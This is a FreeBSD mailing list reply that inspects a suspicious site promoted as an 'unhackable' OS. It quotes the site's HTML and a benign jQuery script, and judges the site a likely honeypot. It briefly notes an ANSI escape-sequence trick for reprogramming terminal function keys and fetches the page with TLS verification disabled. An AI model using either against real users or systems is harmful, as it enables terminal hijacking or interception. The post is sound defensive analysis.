Does not appear to be (too) malicious ...
- Reply: Mehmet Erol Sanliturk : "Re: Does not appear to be (too) malicious ..."
- In reply to: Mario Lobo : "Re: Hello"
- Go to: [ bottom of page ] [ top of archives ] [ this month ]
Date: Sun, 28 Nov 2021 09:16:25 UTC
Am 28.11.21 um 02:06 schrieb Mario Lobo: > On Sat, Nov 27, 2021, 20:27 George Mitchell <george+freebsd@m5p.com> wrote: > >> On 11/27/21 17:40, Obsto Clades via freebsd-hackers wrote: >>> I hacked on the FreeBSD source code to produce a version of the OS that >>> cannot be remotely hacked. Before you tell me that is impossible, I >>> have an answer to that response on my FAQ page. >>> >>> If you are interested in checking out my OS, you can find instructions >>> on my site's home page: https://obstoclades.tech/ >>> >>> I invite you to check it out. >>> >> >> Hmm, my mother told me never to click on links in strange emails ... >> -- George >> > > curl http://obstoclades.tech [...] > <p class="red">Connection denied by Geolocation Setting.</p> > <p><b> Reason: </b> Blocked country: <font color="red"> </font> </p> > <p>The connection was denied because this country is blocked in the > Geolocation settings.</p> > <p>Please contact your administrator for assistance.</p> > </div> > <div class="band">WatchGuard Technologies, Inc.</div> > </div> > </body> > </html> $ fetch --no-verify-peer -v -o /tmp/obstoclades.html https://obstoclades.tech resolving server address: obstoclades.tech:443 SSL options: 82004854 Verify hostname TLSv1.3 connection established using TLS_AES_256_GCM_SHA384 Certificate subject: /CN=obstoclades.tech Certificate issuer: /C=US/O=Let's Encrypt/CN=R3 requesting https://obstoclades.tech/ fetch: https://obstoclades.tech: size of remote file is not known local size / mtime: 34916 / 1638088913 /tmp/obstoclades.html 34 kB 181 kBps 00s There is actual contents in this file, and it does not seem to contain any malicious parts. It starts with: <!DOCTYPE html> <!-- File: ObstoClades.html Copyright (c) 2021 Obsto Clades, LLC --> <html lang="en"> <head> <meta charset="UTF-8"> <title>Security is a Joke</title> <meta name="description" content="This demonstrates a modified BSD Operating System designed to prevent remote hacking of single-purpose computer systems."> <link rel="stylesheet" type="text/css" href="/css/obstoclades.css"/> <link rel="icon" type="image/x-icon" href="/favicon.ico"/> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script> <script src="js/obstoclades.js" defer="defer"></script> </head> And besides the jquery.min.js dowloaded from ajax.googleapis.com only the following short and apparently benign script is downloaded as obstoclades.js: /* * File: obstoclades.js * Copyright (c) 2017 Obsto Clades, LLC */ $(document).ready(function() { var $content = $(".content").hide(); $(".img").on("click", function (e) { $(this).parent().parent().toggleClass("expanded"); var ttt = $(this).parent().children(".tooltiptext"); if ($(this).parent().parent().hasClass("expanded")) { ttt.replaceWith("<span class=\"tooltiptext\">Click to close</span>"); } else { ttt.replaceWith("<span class=\"tooltiptext\">Click to open</span>"); } $(this).parent().parent().next().slideToggle(); }); var textHeight = $("#left-side-header-text").height(); $("#old_english_sheepdog").height(textHeight).width(textHeight); $("#button").click(function() { $("#contactus-form").submit(); }) }); He invites to attack his server using a SSH login with provided credentials, and offers US$1000 for any successful modification of the test server. See the following video, which shows that root on the consonle and root via su in the SSH session get quite different environments: https://obstoclades.tech/video/demo-video.mp4 This looks like a setup with lots of restrictions applied, probably noexec mounts of temporary file systems and the like, possibly jails and/or MAC restrictions. He thinks that an embedded system configured that way could not be attacked, but explains that his concept is limited to e.g. IoT use cases (what he calls "single-purpose computer system"). Anyway, I could not find any malicious content on the web server. Accessing with a SSH session (obviously configured to not allow backwards tunneling) should also not be too dangerous from a dumb terminal (but beware of escape sequence attacks possible with ANSI terminals, e.g. reprogramming of function keys with "ESC[code;string;...p"). It looks to me like kind of a honeypot setup gathering attack attempts to see whether a throw-away system can withstand them. All attack attempts are logged, either to learn how to perform them, or to actually improve the security of his protection concept in case of a successful break-in. Regards, STefan